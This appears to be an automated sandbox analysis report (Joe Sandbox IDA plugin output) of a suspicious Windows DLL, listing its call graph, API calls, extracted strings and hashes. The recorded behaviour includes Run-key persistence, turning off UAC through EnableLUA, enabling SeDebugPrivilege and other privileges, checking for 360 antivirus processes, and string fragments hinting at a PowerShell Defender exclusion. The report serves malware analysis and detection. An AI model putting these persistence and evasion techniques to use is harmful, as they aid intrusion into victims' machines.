6e33c980 wsprintfA call 6e33c980 wsprintfA call 6e335660 call 6e33563a call 6e335660 * 4 call 6e339cf8 call 6e332ddd Sleep * 2 call 6e33c980 call 6e33ac4d call 6e33c980 * 2 call 6e33b5bd FindWindowExA 256->259 290 6e334154-6e334178 call 6e33c980 259->290 291 6e333eea-6e333ef6 call 6e3318ea 259->291 298 6e33417a-6e33417f 290->298 296 6e333f25-6e333f28 291->296 297 6e333ef8-6e333f20 call 6e332388 Sleep call 6e332388 291->297 300 6e333f2e-6e33407f SysAllocString * 2 call 6e332e84 296->300 301 6e3340dd-6e3340e2 296->301 304 6e334662-6e334678 Sleep * 3 call 6e33b94f 297->304 298->298 302 6e334181-6e33418a 298->302 315 6e334081-6e334098 Sleep call 6e332e84 300->315 316 6e33409b-6e3340c9 call 6e3328f5 call 6e333007 300->316 301->304 305 6e3340e8-6e33414f GlobalAddAtomA FindWindowA PostMessageA * 2 FindWindowA PostMessageA 301->305 307 6e33418b-6e334191 302->307 313 6e33467d-6e3346a6 call 6e332887 Sleep 304->313 305->304 307->307 308 6e334193-6e3341aa 307->308 312 6e3341ab-6e3341b1 308->312 312->312 318 6e3341b3-6e3341c0 312->318 327 6e3346f6-6e33478f call 6e33c980 LoadLibraryA call 6e33c980 GetProcAddress 313->327 328 6e3346a8-6e3346bb call 6e332887 313->328 315->316 316->304 333 6e3340cf-6e3340dc call 6e331144 316->333 322 6e3341c1-6e3341c7 318->322 322->322 326 6e3341c9-6e3341f5 call 6e33c980 322->326 339 6e3341f6-6e3341fc 326->339 345 6e334795-6e334890 call 6e33c980 327->345 346 6e334908-6e334929 RegOpenKeyExA 327->346 328->327 340 6e3346bd-6e3346d1 call 6e332887 328->340 333->301 339->339 343 6e3341fe-6e33420d 339->343 340->327 353 6e3346d3-6e3346e6 call 6e332887 340->353 347 6e33420e-6e334214 343->347 357 6e334893-6e334898 345->357 349 6e334944-6e334948 RegCloseKey 346->349 350 6e33492b-6e33493e RegSetValueExA 346->350 347->347 352 6e334216-6e334223 347->352 350->349 355 6e334224-6e33422a 352->355 353->327 360 6e3346e8-6e3346f5 call 6e332388 353->360 355->355 358 6e33422c-6e334258 call 6e33c980 355->358 357->357 361 6e33489a-6e33489e 357->361 370 6e334259-6e33425f 358->370 360->327 364 6e3348a0-6e3348aa 361->364 365 6e3348ae-6e334903 call 6e33c980 wsprintfA 361->365 364->365 369 6e3348ac 364->369 365->346 369->365 370->370 371 6e334261-6e334270 370->371 373 6e334271-6e334277 371->373 373->373 374 6e334279-6e334288 373->374 375 6e334289-6e33428f 374->375 375->375 376 6e334291-6e3342a1 375->376 377 6e3342a2-6e3342a8 376->377 377->377 378 6e3342aa-6e3342ba 377->378 379 6e3342bb-6e3342c1 378->379 379->379 380 6e3342c3-6e3342d1 379->380 381 6e3342d2-6e3342d8 380->381 381->381 382 6e3342da-6e3342ea 381->382 383 6e3342eb-6e3342f1 382->383 383->383 384 6e3342f3-6e334303 383->384 385 6e334304-6e33430a 384->385 385->385 386 6e33430c-6e33431b 385->386 387 6e33431c-6e334322 386->387 387->387 388 6e334324-6e334332 387->388 389 6e334333-6e334339 388->389 389->389 390 6e33433b-6e33434b 389->390 391 6e33434c-6e334352 390->391 391->391 392 6e334354-6e334363 391->392 393 6e334364-6e33436a 392->393 393->393 394 6e33436c-6e33437c 393->394 395 6e33437e-6e334383 394->395 395->395 396 6e334385-6e33438e 395->396 397 6e33438f-6e334395 396->397 397->397 398 6e334397-6e3343ae 397->398 399 6e3343af-6e3343b5 398->399 399->399 400 6e3343b7-6e334427 call 6e33c980 call 6e33ac4d call 6e33c980 399->400 407 6e334428-6e334431 400->407 407->407 408 6e334433-6e334442 407->408 409 6e334445-6e33444e 408->409 409->409 410 6e334450-6e334461 409->410 411 6e334463-6e33446b 410->411 411->411 412 6e33446d-6e334476 411->412 413 6e334479-6e334482 412->413 413->413 414 6e334484-6e33450e call 6e33c980 * 2 call 6e33b5bd FindWindowExA 413->414 414->313 421 6e334514-6e334548 call 6e331030 Sleep CoInitializeEx 414->421 424 6e33454a-6e33456a CoCreateInstance 421->424 425 6e334588-6e334621 call 6e33c980 LoadLibraryA call 6e33c980 GetProcAddress 421->425 426 6e334582 CoUninitialize 424->426 427 6e33456c-6e334572 424->427 425->304 433 6e334623-6e33465f call 6e33c980 425->433 426->425 427->426 429 6e334574-6e33457e 427->429 429->426 433->304
                                      APIs
                                      • _memset.LIBCMT ref: 6E33342A
                                      • Sleep.KERNEL32(00000001), ref: 6E33344B
                                      • _memset.LIBCMT ref: 6E333551
                                      • Sleep.KERNEL32(00000001), ref: 6E333572
                                      • _memset.LIBCMT ref: 6E33367B
                                      • _memset.LIBCMT ref: 6E3337A1
                                      • __time64.LIBCMT ref: 6E3337C1
                                      • _memset.LIBCMT ref: 6E3337E4
                                      • _rand.LIBCMT ref: 6E3337EC
                                        • Part of subcall function 6E33B55E: __getptd.LIBCMT ref: 6E33B55E
                                      • _rand.LIBCMT ref: 6E333802
                                      • Sleep.KERNEL32(00000001), ref: 6E333830
                                      • _memset.LIBCMT ref: 6E333885
                                      • wsprintfA.USER32 ref: 6E3338AA
                                      • _memset.LIBCMT ref: 6E3338C1
                                      • Sleep.KERNEL32(00000001), ref: 6E3338E0
                                      • MakeSureDirectoryPathExists.DBGHELP(?), ref: 6E3338EA
                                      • Sleep.KERNEL32(00000001), ref: 6E3338F2
                                      • _memset.LIBCMT ref: 6E333905
                                      • wsprintfA.USER32 ref: 6E333922
                                      • Sleep.KERNEL32(00000001), ref: 6E33392D
                                      • GetFileAttributesA.KERNEL32(?), ref: 6E333950
                                      • SetFileAttributesA.KERNEL32(?,00000000), ref: 6E333962
                                      • _memset.LIBCMT ref: 6E333994
                                      • wsprintfA.USER32 ref: 6E3339BA
                                      • _memset.LIBCMT ref: 6E3339D1
                                      • Sleep.KERNEL32(00000001), ref: 6E3339F0
                                      • _memset.LIBCMT ref: 6E333A1D
                                      • wsprintfA.USER32 ref: 6E333A3E
                                      • _memset.LIBCMT ref: 6E333A55
                                      • Sleep.KERNEL32(00000001), ref: 6E333A74
                                      • _memset.LIBCMT ref: 6E333AA1
                                      • wsprintfA.USER32 ref: 6E333AC2
                                      • _memset.LIBCMT ref: 6E333AD9
                                      • Sleep.KERNEL32(00000001), ref: 6E333AF8
                                      • _memset.LIBCMT ref: 6E333B25
                                      • wsprintfA.USER32 ref: 6E333B46
                                      • _memset.LIBCMT ref: 6E333B5D
                                      • Sleep.KERNEL32(000003F2), ref: 6E333BA9
                                      • Sleep.KERNEL32(000003F2), ref: 6E333BDC
                                      • Sleep.KERNEL32(000003F2), ref: 6E333C0F
                                      • Sleep.KERNEL32(000003F2), ref: 6E333C42
                                      • __time64.LIBCMT ref: 6E333C50
                                      • _memset.LIBCMT ref: 6E333C6E
                                      • _rand.LIBCMT ref: 6E333C78
                                      • _memset.LIBCMT ref: 6E333CA7
                                      • wsprintfA.USER32 ref: 6E333CF2
                                      • _memset.LIBCMT ref: 6E333D05
                                      • wsprintfA.USER32 ref: 6E333D41
                                        • Part of subcall function 6E339CF8: __EH_prolog3_GS.LIBCMT ref: 6E339D02
                                        • Part of subcall function 6E339CF8: wsprintfA.USER32 ref: 6E339D91
                                        • Part of subcall function 6E339CF8: OutputDebugStringA.KERNEL32(?,?,?,?,?,?,6E347020,000000FF), ref: 6E33A0CA
                                        • Part of subcall function 6E332DDD: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 6E332DF9
                                        • Part of subcall function 6E332DDD: GetFileSize.KERNEL32(00000000,00000000), ref: 6E332E04
                                        • Part of subcall function 6E332DDD: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 6E332E1F
                                        • Part of subcall function 6E332DDD: CloseHandle.KERNEL32(?), ref: 6E332E32
                                        • Part of subcall function 6E332DDD: CloseHandle.KERNEL32(?), ref: 6E332E3E
                                      • Sleep.KERNEL32(00000001), ref: 6E333E25
                                      • Sleep.KERNEL32(00000320), ref: 6E333E2C
                                      • _memset.LIBCMT ref: 6E333E46
                                      • _mbstowcs.LIBCMT ref: 6E333E63
                                        • Part of subcall function 6E33AC4D: __mbstowcs_l_helper.LIBCMT ref: 6E33AC6D
                                      • _memset.LIBCMT ref: 6E333E84
                                      • _memset.LIBCMT ref: 6E333EAB
                                      • _strcat_s.LIBCMT ref: 6E333EC8
                                      • FindWindowExA.USER32(00000000,00000000,?,00000000), ref: 6E333EDB
                                      • Sleep.KERNEL32(000003E8,?,?,?,?,00000000,000000F1), ref: 6E33466D
                                      • Sleep.KERNEL32(00000001,?,?,?,?,00000000,000000F1), ref: 6E334671
                                      • Sleep.KERNEL32(00000001,?,?,?,?,00000000,000000F1), ref: 6E334675
                                        • Part of subcall function 6E33B94F: _doexit.LIBCMT ref: 6E33B95B
                                        • Part of subcall function 6E332887: RegOpenKeyExA.ADVAPI32(?,SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN,00000000,000F013F,?), ref: 6E3328AA
                                        • Part of subcall function 6E332887: RegSetValueExA.ADVAPI32(?,WINDOWS,00000000,00000001,?,?), ref: 6E3328D4
                                        • Part of subcall function 6E332887: RegCloseKey.ADVAPI32(?), ref: 6E3328DF
                                      • Sleep.KERNEL32(000003E8), ref: 6E33469B
                                      • Sleep.KERNEL32(?,?,?,?,?,?,?,?,00000000,000000FB), ref: 6E333F0C
                                        • Part of subcall function 6E332388: VariantClear.OLEAUT32(?), ref: 6E3324AE
                                      • SysAllocString.OLEAUT32(?), ref: 6E334053
                                      • SysAllocString.OLEAUT32(?), ref: 6E33405C
                                        • Part of subcall function 6E332388: __EH_prolog3_GS.LIBCMT ref: 6E332392
                                        • Part of subcall function 6E332388: CoInitializeEx.OLE32(00000000,00000000,00000420,6E3346F5,?), ref: 6E33239B
                                        • Part of subcall function 6E332388: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 6E3323AD
                                        • Part of subcall function 6E332388: CoCreateInstance.OLE32(6E3484F0,00000000,00000001,6E3482E0,?), ref: 6E3323C7
                                        • Part of subcall function 6E332388: VariantInit.OLEAUT32(?), ref: 6E3323D4
                                        • Part of subcall function 6E332388: VariantInit.OLEAUT32(?), ref: 6E3323F4
                                        • Part of subcall function 6E332388: VariantInit.OLEAUT32(?), ref: 6E332411
                                        • Part of subcall function 6E332388: VariantInit.OLEAUT32(?), ref: 6E33242E
                                        • Part of subcall function 6E332388: VariantClear.OLEAUT32(?), ref: 6E33248D
                                        • Part of subcall function 6E332388: VariantClear.OLEAUT32(?), ref: 6E332496
                                        • Part of subcall function 6E332388: VariantClear.OLEAUT32(?), ref: 6E33249F
                                      • _memset.LIBCMT ref: 6E334169
                                      • _memset.LIBCMT ref: 6E3341E6
                                      • _memset.LIBCMT ref: 6E334249
                                        • Part of subcall function 6E3318EA: OpenProcess.KERNEL32(00001000,00000000,00000000), ref: 6E331BCD
                                        • Part of subcall function 6E3318EA: OpenProcessToken.ADVAPI32(?,000F01FF,?), ref: 6E331BEB
                                        • Part of subcall function 6E3318EA: CloseHandle.KERNEL32(?), ref: 6E331BF8
                                        • Part of subcall function 6E3318EA: OpenProcess.KERNEL32(00001000,00000000,00000000), ref: 6E331E65
                                        • Part of subcall function 6E3318EA: OpenProcessToken.ADVAPI32(?,000F01FF,?), ref: 6E331E83
                                        • Part of subcall function 6E3318EA: CloseHandle.KERNEL32(?), ref: 6E331E90
                                        • Part of subcall function 6E3318EA: OpenProcess.KERNEL32(00001000,00000000,00000000), ref: 6E3320FD
                                        • Part of subcall function 6E3318EA: OpenProcessToken.ADVAPI32(?,000F01FF,?), ref: 6E33211B
                                        • Part of subcall function 6E3318EA: CloseHandle.KERNEL32(?), ref: 6E332128
                                      • _memset.LIBCMT ref: 6E334721
                                      • LoadLibraryA.KERNEL32(?), ref: 6E334731
                                      • _memset.LIBCMT ref: 6E334772
                                      • GetProcAddress.KERNEL32(00000000,?), ref: 6E334783
                                      • _memset.LIBCMT ref: 6E3347B5
                                      • _memset.LIBCMT ref: 6E3348C3
                                      • wsprintfA.USER32 ref: 6E3348E0
                                      • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,00000000,00000102,?), ref: 6E334921
                                      • RegSetValueExA.ADVAPI32(?,EnableLUA,00000000,00000004,?,00000004), ref: 6E33493E
                                      • RegCloseKey.ADVAPI32(?), ref: 6E334948
                                        • Part of subcall function 6E332388: _memset.LIBCMT ref: 6E33269E
                                        • Part of subcall function 6E332388: _memset.LIBCMT ref: 6E3326D1
                                        • Part of subcall function 6E332388: _mbstowcs.LIBCMT ref: 6E3326E9
                                        • Part of subcall function 6E332388: SysAllocString.OLEAUT32(?), ref: 6E3326FE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2900320273.000000006E331000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E330000, based on PE: true
                                      • Associated: 00000000.00000002.2900241726.000000006E330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900367456.000000006E348000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900566258.000000006E350000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900614569.000000006E354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e330000_loaddll32.jbxd
                                      Similarity
                                      • API ID: _memset$Sleep$wsprintf$OpenVariant$Close$Process$FileHandle$ClearInitString$AllocToken_rand$AttributesCreateH_prolog3_InitializeValue__time64_mbstowcs$AddressDebugDirectoryExistsFindInstanceLibraryLoadMakeOutputPathProcReadSecuritySizeSureWindow__getptd__mbstowcs_l_helper_doexit_strcat_s
                                      • String ID: (x8$ -Ex$ -Fo$ Byp$%s%s$%s%s$%s%s\$%s.e$%sFileSystem_$'%s'$-Exe$.exe$0SafeMonClass$2.l$6)\$A$A$Add-$BkSha$C:\P$CU\SOF$EnableLUA$G_SZ /d "$MpPr$Open$Q36$SHELL_TrayWnd$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System$Shel$Shel$Shel$Shel$Shell_TrayWnd$Stdio.dll$TWARE\Mic$am F$ass $ath $clus$cute$cute$cuti$d "HK$dll$dll$dowWndClass$dows\Curr$efer$ence$entVe$ft\Win$g.e$iles$ionP$l32.$l32.$lExe$lExe$lalala123%$le:///$licy$ll.e$mo /t RE$onPo$powe$rce$rogr$roso$rshe$rsion\R$t3d.$t4d.$t5d.$t6d.$text/$tmp$tmp$tmp$tmp$un" /v de$xe$xe
                                      • API String ID: 3219744759-1786408990
                                      • Opcode ID: 1652cbe7878ec892a87a5cf80b49ae38ffa830fe407e27c9657a6830df14239e
                                      • Instruction ID: f041ea214579be77229fc66e8443478f3800c71f0f959386b78d1ca518e5dc57
                                      • Opcode Fuzzy Hash: 1652cbe7878ec892a87a5cf80b49ae38ffa830fe407e27c9657a6830df14239e
                                      • Instruction Fuzzy Hash: 18C2A07154C385AAE321DBA09845FEBB7E9EF84704F104C2EE5C8CB251EBB29545CB93
                                      APIs
                                        • Part of subcall function 6E331772: GetCurrentProcess.KERNEL32(00000028,?), ref: 6E331788
                                        • Part of subcall function 6E331772: OpenProcessToken.ADVAPI32(00000000), ref: 6E33178F
                                        • Part of subcall function 6E3317FE: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 6E331821
                                        • Part of subcall function 6E3317FE: _memset.LIBCMT ref: 6E331836
                                        • Part of subcall function 6E3317FE: Process32FirstW.KERNEL32(00000000,?), ref: 6E331850
                                        • Part of subcall function 6E3317FE: CloseHandle.KERNEL32(00000000), ref: 6E33188A
                                      • OpenProcess.KERNEL32(00001000,00000000,00000000), ref: 6E33192D
                                      • OpenProcessToken.ADVAPI32(?,000F01FF,?), ref: 6E331947
                                      • CloseHandle.KERNEL32(?), ref: 6E331954
                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 6E331962
                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 6E33198A
                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 6E3319AC
                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeChangeNotifyPrivilege,?), ref: 6E3319CC
                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeTcbPrivilege,?), ref: 6E3319EB
                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeImpersonatePrivilege,?), ref: 6E331A0A
                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeLoadDriverPrivilege,?), ref: 6E331A29
                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeRestorePrivilege,?), ref: 6E331A48
                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeBackupPrivilege,?), ref: 6E331A67
                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 6E331A86
                                      • OpenProcess.KERNEL32(00001000,00000000,00000000), ref: 6E331BCD
                                      • OpenProcessToken.ADVAPI32(?,000F01FF,?), ref: 6E331BEB
                                      • CloseHandle.KERNEL32(?), ref: 6E331BF8
                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 6E331C09
                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 6E331C31
                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 6E331C4B
                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeChangeNotifyPrivilege,?), ref: 6E331C6B
                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeTcbPrivilege,?), ref: 6E331C8A
                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeImpersonatePrivilege,?), ref: 6E331CA9
                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeLoadDriverPrivilege,?), ref: 6E331CC8
                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeRestorePrivilege,?), ref: 6E331CE7
                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeBackupPrivilege,?), ref: 6E331D06
                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 6E331D25
                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeIncreaseQuotaPrivilege,?), ref: 6E331D63
                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeTakeOwnershipPrivilege,?), ref: 6E331D82
                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeIncreaseBasePriorityPrivilege,?), ref: 6E331DA1
                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 6E331DC0
                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeAssignPrimaryTokenPrivilege,?), ref: 6E331DDF
                                      • GetLengthSid.ADVAPI32(?), ref: 6E331E1D
                                      • SetTokenInformation.ADVAPI32(?,00000019,?,-00000008), ref: 6E331E30
                                      • CloseHandle.KERNEL32(?), ref: 6E331E3F
                                      • CloseHandle.KERNEL32(?), ref: 6E331E44
                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeBackupPrivilege,?), ref: 6E331F9E
                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 6E331FBD
                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeSystemEnvironmentPrivilege,?), ref: 6E331FDC
                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeIncreaseQuotaPrivilege,?), ref: 6E331FFB
                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeTakeOwnershipPrivilege,?), ref: 6E33201A
                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeIncreaseBasePriorityPrivilege,?), ref: 6E332039
                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 6E332058
                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeAssignPrimaryTokenPrivilege,?), ref: 6E332077
                                      • GetLengthSid.ADVAPI32(?), ref: 6E3320B5
                                      • SetTokenInformation.ADVAPI32(?,00000019,?,-00000008), ref: 6E3320C8
                                      • CloseHandle.KERNEL32(?), ref: 6E3320D7
                                      • CloseHandle.KERNEL32(?), ref: 6E3320DC
                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 6E332139
                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 6E332161
                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 6E33217B
                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeChangeNotifyPrivilege,?), ref: 6E33219B
                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeTcbPrivilege,?), ref: 6E3321BA
                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeImpersonatePrivilege,?), ref: 6E3321D9
                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeLoadDriverPrivilege,?), ref: 6E3321F8
                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeRestorePrivilege,?), ref: 6E332217
                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeBackupPrivilege,?), ref: 6E332236
                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 6E332255
                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeSystemEnvironmentPrivilege,?), ref: 6E332274
                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeIncreaseQuotaPrivilege,?), ref: 6E332293
                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeTakeOwnershipPrivilege,?), ref: 6E3322B2
                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeIncreaseBasePriorityPrivilege,?), ref: 6E3322D1
                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 6E3322F0
                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeAssignPrimaryTokenPrivilege,?), ref: 6E33230F
                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeSystemEnvironmentPrivilege,?), ref: 6E331D44
                                        • Part of subcall function 6E3318A0: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 6E3318D8
                                      • OpenProcess.KERNEL32(00001000,00000000,00000000), ref: 6E331E65
                                      • OpenProcessToken.ADVAPI32(?,000F01FF,?), ref: 6E331E83
                                      • CloseHandle.KERNEL32(?), ref: 6E331E90
                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 6E331EA1
                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 6E331EC9
                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 6E331EE3
                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeChangeNotifyPrivilege,?), ref: 6E331F03
                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeTcbPrivilege,?), ref: 6E331F22
                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeImpersonatePrivilege,?), ref: 6E331F41
                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeLoadDriverPrivilege,?), ref: 6E331F60
                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeRestorePrivilege,?), ref: 6E331F7F
                                      • OpenProcess.KERNEL32(00001000,00000000,00000000), ref: 6E3320FD
                                      • OpenProcessToken.ADVAPI32(?,000F01FF,?), ref: 6E33211B
                                      • CloseHandle.KERNEL32(?), ref: 6E332128
                                      • GetLengthSid.ADVAPI32(?), ref: 6E33234D
                                      • SetTokenInformation.ADVAPI32(?,00000019,?,-00000008), ref: 6E332360
                                      • CloseHandle.KERNEL32(?), ref: 6E33236F
                                      • CloseHandle.KERNEL32(?), ref: 6E332374
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2900320273.000000006E331000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E330000, based on PE: true
                                      • Associated: 00000000.00000002.2900241726.000000006E330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900367456.000000006E348000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900566258.000000006E350000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900614569.000000006E354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e330000_loaddll32.jbxd
                                      Similarity
                                      • API ID: LookupPrivilegeValue$Token$CloseHandle$Process$Open$AdjustPrivileges$InformationLength$CreateCurrentFirstProcess32SnapshotToolhelp32_memset
                                      • String ID: $ $360rp.exe$360rps.exe$360sd.exe$360tray.exe$SeAssignPrimaryTokenPrivilege$SeBackupPrivilege$SeChangeNotifyPrivilege$SeDebugPrivilege$SeImpersonatePrivilege$SeIncreaseBasePriorityPrivilege$SeIncreaseQuotaPrivilege$SeLoadDriverPrivilege$SeRestorePrivilege$SeSecurityPrivilege$SeShutdownPrivilege$SeSystemEnvironmentPrivilege$SeTakeOwnershipPrivilege$SeTcbPrivilege
                                      • API String ID: 3688516431-1742837192
                                      • Opcode ID: 85eb3b80029bfc29f44a35e71a8bcae922d5776f0c216b7001c70d77bbbbe535
                                      • Instruction ID: 746d697a255c4c9bc65568469bcfb232dba3e395a0d35a0cfd38531d8d7e3d06
                                      • Opcode Fuzzy Hash: 85eb3b80029bfc29f44a35e71a8bcae922d5776f0c216b7001c70d77bbbbe535
                                      • Instruction Fuzzy Hash: E6721B72E0115EBBDF40DBE4DD80DFEB7BEAF48244B204466F515E7140EB35AA0A8B64
                                      APIs
                                        • Part of subcall function 6E337AAC: SetFilePointer.KERNEL32(FA83E855,00000000,00000000,00000002,6E337C62,?,00000000,?,?,?,6E337DB9,?,00000140,00000000,00000000), ref: 6E337AD8
                                      • __fassign.LIBCMT ref: 6E338A9E
                                      • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6E338C03
                                      • LocalFileTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6E338C2F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2900320273.000000006E331000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E330000, based on PE: true
                                      • Associated: 00000000.00000002.2900241726.000000006E330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900367456.000000006E348000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900566258.000000006E350000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900614569.000000006E354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e330000_loaddll32.jbxd
                                      Similarity
                                      • API ID: FileTime$LocalPointerSystem__fassign
                                      • String ID: /../$/..\$\../$\..\
                                      • API String ID: 3768451866-3885502717
                                      • Opcode ID: ca7008af39829ddb28a7f5c7618c3724e248876388eb6843c79685cfae740b50
                                      • Instruction ID: 0d5af74c0c2d5163f85a545b4df6da0e532165754369bb59452c20e67aa08e77
                                      • Opcode Fuzzy Hash: ca7008af39829ddb28a7f5c7618c3724e248876388eb6843c79685cfae740b50
                                      • Instruction Fuzzy Hash: 69F114719042A99FDB64CFA8C894BD9BBF0EF09304F2045D9D89CEB281D735AA85CF50
                                      APIs
                                      • GetCurrentProcess.KERNEL32(00000028,?), ref: 6E331788
                                      • OpenProcessToken.ADVAPI32(00000000), ref: 6E33178F
                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 6E3317A8
                                      • CloseHandle.KERNEL32(?), ref: 6E3317B5
                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 6E3317E6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2900320273.000000006E331000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E330000, based on PE: true
                                      • Associated: 00000000.00000002.2900241726.000000006E330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900367456.000000006E348000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900566258.000000006E350000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900614569.000000006E354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e330000_loaddll32.jbxd
                                      Similarity
                                      • API ID: ProcessToken$AdjustCloseCurrentHandleLookupOpenPrivilegePrivilegesValue
                                      • String ID: SeDebugPrivilege
                                      • API String ID: 3038321057-2896544425
                                      • Opcode ID: 331daa6b6178c0487af67cf39c7dc5ca1cd1fef16f776930f67e95da649ef706
                                      • Instruction ID: 58c56b40260c89b1b38dd5fc4c60efeb3a9433cc11f7104d5beb2cc55f497204
                                      • Opcode Fuzzy Hash: 331daa6b6178c0487af67cf39c7dc5ca1cd1fef16f776930f67e95da649ef706
                                      • Instruction Fuzzy Hash: 3C111B71A00219EBEF00EFE5C849FAFBBBCBB09704F204455E501A6180DB76A5489BA0
                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 6E331821
                                      • _memset.LIBCMT ref: 6E331836
                                      • Process32FirstW.KERNEL32(00000000,?), ref: 6E331850
